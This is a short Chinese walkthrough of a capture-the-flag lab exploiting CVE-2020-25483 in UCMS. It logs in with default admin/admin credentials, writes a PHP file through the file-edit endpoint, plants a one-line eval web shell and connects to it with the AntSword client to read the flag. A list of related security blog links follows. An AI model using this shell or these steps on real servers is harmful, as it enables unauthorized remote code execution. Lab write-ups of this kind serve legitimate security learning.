春秋云境CVE-2020-25483

1.阅读靶场介绍

这里得到就是文件写入

然后再读取文件

2.启动靶场

如下图所示

这里我们可以直接再url后面加上

/ucms/login.php

进入下面所示的页面

这里输入账号/密码:admin/admin

下一步就是输入如下图的url

各位可以参考参考

https://eci-2zeac6a5z2rxlqan7m7a.cloudeci1.ichunqiu.com:80/ucms/index.php?do=sadmin_fileedit&dir=/&file=1.phpw

然后在下面输入这个木马

复制代码
<?php @eval($_POST['cmd']);?>

然后访问

这个url:https://eci-2zeac6a5z2rxlqan7m7a.cloudeci1.ichunqiu.com:80/1.php

得到的是一片空白那就是对的

3.中国蚁剑启动

输入这些参数

然后就可以找到flag了

感谢各位的观看哟

相关推荐
treesforest14 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
零零信安14 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
上海云盾第一敬业销售14 天前
深入解析WAF的工作原理与机制
web安全·ddos
憧憬成为web高手14 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub14 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
zhengfei61114 天前
小白级手册——全面剖析红队信息收集思考
网络·安全·web安全
爱网络爱Linux14 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc14 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing14 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
顾凌陵14 天前
Web安全二阶段综合测试:知识点速查与实战技巧
安全·web安全